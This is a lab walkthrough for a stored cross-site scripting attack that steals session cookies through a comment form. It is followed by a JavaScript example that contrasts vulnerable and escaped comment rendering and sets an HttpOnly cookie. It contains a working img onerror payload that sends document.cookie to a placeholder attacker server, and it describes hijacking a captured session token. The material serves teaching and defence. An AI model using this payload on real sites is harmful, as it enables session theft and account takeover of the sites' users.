22) Exploiting cross-site scripting to steal cookies

Locate possible injection points

As usual, the first step is to analyse the application. We have a comment form, so we fill it with a random string like xxxx, then open the developer tools and find where the user input ends up in the HTML.

Let's try to inject a simple img payload in the comment field and trigger an alert:

payload => <img src=x onerror=alert(1)>

Now let's open Burp Suite Collaborator and use the following payload:

<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>

This payload will make anyone who views the comment issue a GET request to your subdomain on the public Collaborator server, with their cookie in the URL query parameter c.

If Collaborator didn't poll automatically, make sure to click on Poll now.

So this is the stolen session cookie:

zO3ZD5fvkLh3kA55da9fHJXdGMqXePrg

Make sure to replace your own session cookie with the stolen one and save the edit. I used the Cookie Editor extension; you can use the devtools if you prefer.

Now refresh the page with the hijacked session, and the lab is solved.
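As an added example that is not part of the lab or this write-up, here is the kind of comment renderer the payload above abuses, shown in its vulnerable form next to a hardened one: user input is HTML-escaped at output time so the injected img tag is rendered as text, and the session cookie is issued with HttpOnly so document.cookie cannot read it even if a script does run. Function and cookie names are assumptions.

```javascript
// Payload quoted from the write-up above, used here only as test input.
const COOKIE_STEALER =
  '<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>';

// Vulnerable: the comment body is concatenated straight into the page, so the
// browser parses the attacker's <img> tag and fires its onerror handler.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b><p>${body}</p></div>`;
}

// Encode the five characters that let text break out of an HTML text node or
// attribute value. After this, user input can never open a new tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every user-controlled field is escaped when it is written out.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b><p>${escapeHtml(body)}</p></div>`;
}

// Defence in depth: a cookie flagged HttpOnly is never exposed through
// document.cookie, so a stored XSS cannot exfiltrate it the way the lab does.
// Secure and SameSite=Lax are included as sensible defaults (assumed values).
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Check used in the self-test below: true if the rendered HTML still contains a
// real tag carrying an on* event handler, i.e. the payload survived as markup.
function containsEventHandlerTag(html) {
  return /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Self-check: the same comment through both renderers.
const unsafe = renderCommentUnsafe('carlos', COOKIE_STEALER);
const safe = renderCommentSafe('carlos', COOKIE_STEALER);
console.log('vulnerable render keeps live handler:', containsEventHandlerTag(unsafe)); // true
console.log('hardened render keeps live handler:  ', containsEventHandlerTag(safe));   // false
console.log(sessionCookieHeader('session', '<session-token-placeholder>'));
```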
